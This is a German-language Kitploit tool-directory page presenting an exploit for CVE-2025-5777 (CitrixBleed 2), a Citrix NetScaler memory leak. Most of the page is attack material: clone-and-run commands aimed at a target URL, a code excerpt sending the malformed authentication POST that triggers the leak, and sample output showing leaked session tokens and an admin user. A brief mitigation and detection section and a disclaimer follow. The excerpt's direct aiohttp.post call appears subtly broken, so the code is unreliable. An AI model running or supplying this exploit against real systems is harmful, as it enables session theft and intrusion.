Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5777 — CVE-2025-5777 Citrix NetScaler Speicherleck-Exploit (CitrixBleed 2) | Kitploit
Tools/GitHubGitHub/bughuntar/cve-2025-5777
SpeicherforensikSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

CVE-2025-5777 Citrix NetScaler Speicherleck-Exploit (CitrixBleed 2)

Repository anzeigen
30753vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-5777 - Citrix NetScaler Speicherleck-Exploit

Banner


📌 Übersicht

Dieses Tool demonstriert CVE-2025-5777, eine kritische Speicherleck-Schwachstelle in Citrix NetScaler ADC/Gateway-Geräten. Der Exploit gibt vertrauliche Speicherinhalte durch fehlerhafte Authentifizierungsanfragen preis.

Hauptfunktionen:
✔ Speicherleck-Erkennung durch XML-Antwort-Parsing
✔ Hex+ASCII-Dump der geleakten Speicherbereiche
✔ Burp Suite-kompatibles Anfrageformat
✔ Asynchrone Anfragen für effizientes Testen


🔍 Proof-of-Concept

1. Angreifbare Anfrage (Burp Suite)

Burp Request

2. Exploit in Aktion

Tool Execution


⚡ Schnellstart

root@kitploit:~
git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

Erwartete Ausgabe:

root@kitploit:~
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ Gegenmaßnahmen

AktionBefehl/Referenz
PatchCitrix Security Bulletin
WAF-RegelBlock POST /p/u/doAuthentication.do with malformed params

📚 Ressourcen

  • NVD-Eintrag
  • Technische Beschreibung

🖥️ Code-Highlights

root@kitploit:~
# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ Rechtlicher Hinweis

root@kitploit:~
- This tool is for authorized testing ONLY.
- Unauthorized use violates international cybersecurity laws.

Vollständiger Haftungsausschluss: DISCLAIMER.md

Autor: Professor the Hunter

Tool herunterladen
Erkennung
grep 'POST /p/u/doAuthentication.do' netscaler.log